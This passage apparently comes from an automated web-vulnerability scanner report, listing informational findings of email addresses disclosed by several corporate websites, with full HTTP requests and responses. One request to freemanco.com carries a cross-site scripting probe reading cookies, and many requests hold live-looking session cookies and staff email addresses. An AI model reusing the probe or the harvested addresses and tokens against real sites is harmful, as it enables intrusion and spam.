User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849582858:ss=1303849513702; ASPSESSIONIDSSADSTDQ=MAJBMDCDKEKIBPLKKCOBMNHD

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 31428
Content-Type: text/html
Cache-Control: private
Content-Length: 31428


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Group Products - BCBST.com</title>
<meta name="WT.mc_id" content=""/>
<meta name="WT.cg_n" con
...[SNIP]...
<a href="mailto:john_maki@bcbst.com">john_maki@bcbst.com</a>
...[SNIP]...
<a href="mailto:sheila_cook@bcbst.com">sheila_cook@bcbst.com</a>
...[SNIP]...
<a href="mailto:jeff_price@bcbst.com">jeff_price@bcbst.com</a>
...[SNIP]...
<a title="mailto:agentsandbrokers@bcbst.com" href="mailto:agentsandbrokers@bcbst.com">agentsandbrokers@bcbst.com</a>
...[SNIP]...

24.35. https://www.bcbst.com/brokers/individual/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /brokers/individual/

Issue detail

The following email address was disclosed in the response:

Request

GET /brokers/individual/ HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849582858:ss=1303849513702; ASPSESSIONIDSSADSTDQ=MAJBMDCDKEKIBPLKKCOBMNHD

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:56:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 29094
Content-Type: text/html
Cache-Control: private
Content-Length: 29094


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Individual Products - BCBST.com</title>
<meta name="WT.mc_id" content=""/>
<meta name="WT.cg_n
...[SNIP]...
<a href="mailto:agentsandbrokers@bcbst.com">agentsandbrokers@bcbst.com</a>
...[SNIP]...

24.36. http://www.bertelsmann.com/bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bertelsmann.com
Path:   /bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php?client=all HTTP/1.1
Host: www.bertelsmann.com
Proxy-Connection: keep-alive
Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php?language=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:40:23 GMT
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.2.11
Set-Cookie: BMAG=4d867667782fd9761fdef715fd68bae0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: must-revalidate
Pragma: no-cache
ETag: 43f1a0f0242bf1b19a6c4f06425ceb46
Content-Length: 108346
Connection: close
Content-Type: text/javascript; charset=utf-8

// Main.js
/**
* JavaScript library for use with HTML_AJAX
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* L
...[SNIP]...
<josh@bluga.net>
...[SNIP]...
<arpad@php.net>
...[SNIP]...
<davidc@php.net>
...[SNIP]...
<auroraeosrose@gmail.com>
...[SNIP]...
<arpad@php.net>
...[SNIP]...
<auroraeosrose@gmail.com>
...[SNIP]...
<arpad@php.net>
...[SNIP]...
<arpad@php.net>
...[SNIP]...
<arpad@rajeczy.com>
...[SNIP]...
<davidc@php.net>
...[SNIP]...
<josh@bluga.net>
...[SNIP]...
<josh@bluga.net>
...[SNIP]...
<josh@bluga.net>
...[SNIP]...

24.37. http://www.bertelsmann.com/bertelsmann_corp/wms41/js/scripts.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bertelsmann.com
Path:   /bertelsmann_corp/wms41/js/scripts.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /bertelsmann_corp/wms41/js/scripts.js HTTP/1.1
Host: www.bertelsmann.com
Proxy-Connection: keep-alive
Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php?language=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:19:26 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Tue, 23 Mar 2010 12:30:25 GMT
ETag: "ac993-65b00-48276fa5d1a40"
Accept-Ranges: bytes
Content-Length: 416512
Connection: close
Content-Type: application/x-javascript

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date:
...[SNIP]...
return this.each(function(){if($('> iframe.bgiframe',this).length==0)this.insertBefore(document.createElement(html),this.firstChild);});}return this;};})(jQuery);

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $Las
...[SNIP]...

24.38. http://www.cargill.com/company/financial/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargill.com
Path:   /company/financial/index.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /company/financial/index.jsp HTTP/1.1
Host: www.cargill.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000ysx-ZD0yWuxrqGU4fi3SV6q:-1; __utma=181704245.538130907.1303847440.1303847440.1303847440.1; __utmb=181704245; __utmc=181704245; __utmz=181704245.1303847440.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:50:48 GMT
Server: IBM_HTTP_Server
Content-Length: 28472
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-Type" c
...[SNIP]...
<a href="mailto:financials@cargill.com">financials@cargill.com</a>
...[SNIP]...

24.39. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.computerworld.com
Path:   /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach

Issue detail

The following email address was disclosed in the response:

Request

GET /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach?taxonomyId=17 HTTP/1.1
Host: www.computerworld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=22922409.1116149048.1303476387.1303476387.1303476387.1; __utmz=22922409.1303476387.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __switchTo5x=60; __unam=8eb1eeb-12f7d3f43b2-c1bcf53-1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
piExres: Tue, 26 Apr 2011 22:00:36 GMT
nnCoection: close
Cheac-Control: private
ETag: "KXAOEEJGPLWLQSPYV"
Vary: Accept-Encoding
Cache-Control: public, max-age=521
Expires: Tue, 26 Apr 2011 22:00:49 GMT
Date: Tue, 26 Apr 2011 21:52:08 GMT
Connection: close
Content-Length: 134301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
<a href='mailto:jvijayan@computerworld.com'>jvijayan@computerworld.com</a>
...[SNIP]...

24.40. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.computerworlduk.com
Path:   /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

Issue detail

The following email address was disclosed in the response:

Request

GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss HTTP/1.1
Host: www.computerworlduk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=6230266d0f7d1fe0d9aa114e2114b137a4f1;path=/
Set-Cookie: JSESSIONID=6230266d0f7d1fe0d9aa114e2114b137a4f1;domain=.computerworlduk.com;path=/
Date: Tue, 26 Apr 2011 21:49:09 GMT
Connection: close


       <!DOCTYPE html>
   <html>
       <head><script type="text/javascript">/* <![CDATA[ */_cf_loadingtexthtml="<img alt=' ' src='/CFIDE/scripts/ajax/resources/cf/images/loading.gif'/>";
_cf_contextpath=""
...[SNIP]...
<script type="text/javascript" language="javascript">
       var SocialMediaUnit6 = new SocialMediaPollUnit(6,' via @Think_Print','Tweet your answer here...',123,10,7,'joao_felizardo@idg.co.uk');
   </script>
...[SNIP]...

24.41. http://www.freemanco.com/freemanco/javascript/image-slideshow.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemanco.com
Path:   /freemanco/javascript/image-slideshow.js

Issue detail

The following email address was disclosed in the response:

Request

GET /freemanco/javascript/image-slideshow.js HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://www.freemanco.com/freemanco/?fs=true&_requestid=118715
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:05:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
ETag: W/"5414-1303250542000"
Last-Modified: Tue, 19 Apr 2011 22:02:22 GMT
Content-Length: 5414
Content-Type: text/javascript

   /***********************************************************************************************

   Copyright (c) 2005 - Alf Magne Kalleland post@dhtmlgoodies.com

   UPDATE LOG:

   March, 10th, 2006 : Added support for a message while large image is loading

   Get this and other scripts at www.dhtmlgoodies.com

   You can use this script freely as long as th
...[SNIP]...

24.42. http://www.freemanco.com/freemanco/javascript/jquery/jquery.dataTables.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemanco.com
Path:   /freemanco/javascript/jquery/jquery.dataTables.js

Issue detail

The following email address was disclosed in the response:

Request

GET /freemanco/javascript/jquery/jquery.dataTables.js HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://www.freemanco.com/freemanco/?fs=true&_requestid=118715
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:05:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
ETag: W/"217867-1303250542000"
Last-Modified: Tue, 19 Apr 2011 22:02:22 GMT
Content-Length: 217867
Content-Type: text/javascript

/*
* File: jquery.dataTables.js
* Version: 1.7.5
* Description: Paginate, search and sort HTML tables
* Author: Allan Jardine (www.sprymedia.co.uk)
* Created: 28/3/2008
* Language: Javascript
* License: GPL v2 or BSD 3 point style
* Project: Mtaala
* Contact: allan.jardine@sprymedia.co.uk
*
* Copyright 2008-2010 Allan Jardine, all rights reserved.
*
* This source file is free software, under either the GPL v2 license or a
* BSD style license, as supplied with this software.
...[SNIP]...

24.43. http://www.freemanco.com/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemanco.com
Path:   /images/favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /images/favicon.ico HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1; __utmz=95684043.1303848339.1.1.utmcsr=freemanco.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=95684043.1984575328.1303848339.1303848339.1303848339.1; __utmc=95684043; __utmb=95684043.1.10.1303848339; hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 20:13:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1057

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:unixadmin@freemanco.com" />
...[SNIP]...
<a href="mailto:unixadmin@freemanco.com">
...[SNIP]...

24.44. http://www.freemanco.com/images/site/small-logo.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemanco.com
Path:   /images/site/small-logo.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /images/site/small-logo.ico HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; JSESSIONID=A69190F969B4B3882863F4380364FE84.node2; __utmz=95684043.1303850323.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=95684043.1984575328.1303848339.1303848339.1303850323.2; __utmc=95684043; __utmb=95684043.1.10.1303850323

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 20:39:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1057

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:unixadmin@freemanco.com" />
...[SNIP]...
<a href="mailto:unixadmin@freemanco.com">
...[SNIP]...

24.45. http://www.freemanco.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemanco.com
Path:   /store/

Issue detail

The following email address was disclosed in the response:

Request

GET /store/?from=freemancofb27d'%3balert(document.cookie)//6c9edc3f802 HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; JSESSIONID=A69190F969B4B3882863F4380364FE84.node2; __utmz=95684043.1303850323.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=95684043.1984575328.1303848339.1303848339.1303850323.2; __utmc=95684043; __utmb=95684043.3.10.1303850323

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:59:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wICBd
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Content-Length: 87216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <hea
...[SNIP]...
<a href="mailto:Infochange@freemanco.com" target="_blank">Infochange@freemanco.com</a>
...[SNIP]...

24.46. http://www.freemanco.com/store/customer/customerSearch.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemanco.com
Path:   /store/customer/customerSearch.jsp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /store/customer/customerSearch.jsp HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; JSESSIONID=A69190F969B4B3882863F4380364FE84.node2; __utmz=95684043.1303850323.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=95684043.1984575328.1303848339.1303848339.1303850323.2; __utmc=95684043; __utmb=95684043.1.10.1303850323

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:59:15 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wICBd
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Content-Length: 110935


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <hea
...[SNIP]...
<a href="mailto:CustomerSupport@freemanco.com">CustomerSupport@freemanco.com</a>
...[SNIP]...
<a href="mailto:Infochange@freemanco.com" target="_blank">Infochange@freemanco.com</a>
...[SNIP]...

24.47. http://www.freemanco.com/store/user/forgetUserName.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemanco.com
Path:   /store/user/forgetUserName.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /store/user/forgetUserName.jsp HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; JSESSIONID=A69190F969B4B3882863F4380364FE84.node2; __utmz=95684043.1303850323.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=95684043.1984575328.1303848339.1303848339.1303850323.2; __utmc=95684043; __utmb=95684043.1.10.1303850323

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:59:14 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wICBd
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Content-Length: 85505


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <hea
...[SNIP]...
<a href="mailto:Infochange@freemanco.com" target="_blank">Infochange@freemanco.com</a>
...[SNIP]...

24.48. https://www.freemanco.com/store/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.freemanco.com
Path:   /store/index.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /store/index.jsp?_requestid=131058 HTTP/1.1
Host: www.freemanco.com
Connection: keep-alive
Referer: http://www.freemanco.com/freemanco/ourwork/creativeservices/creative.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1; __utmz=95684043.1303848339.1.1.utmcsr=freemanco.com|utmccn=(referral)|utmcmd=referral|utmcct=/; hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; __utma=95684043.1984575328.1303848339.1303848339.1303848339.1; __utmc=95684043; __utmb=95684043.2.10.1303848339

Response

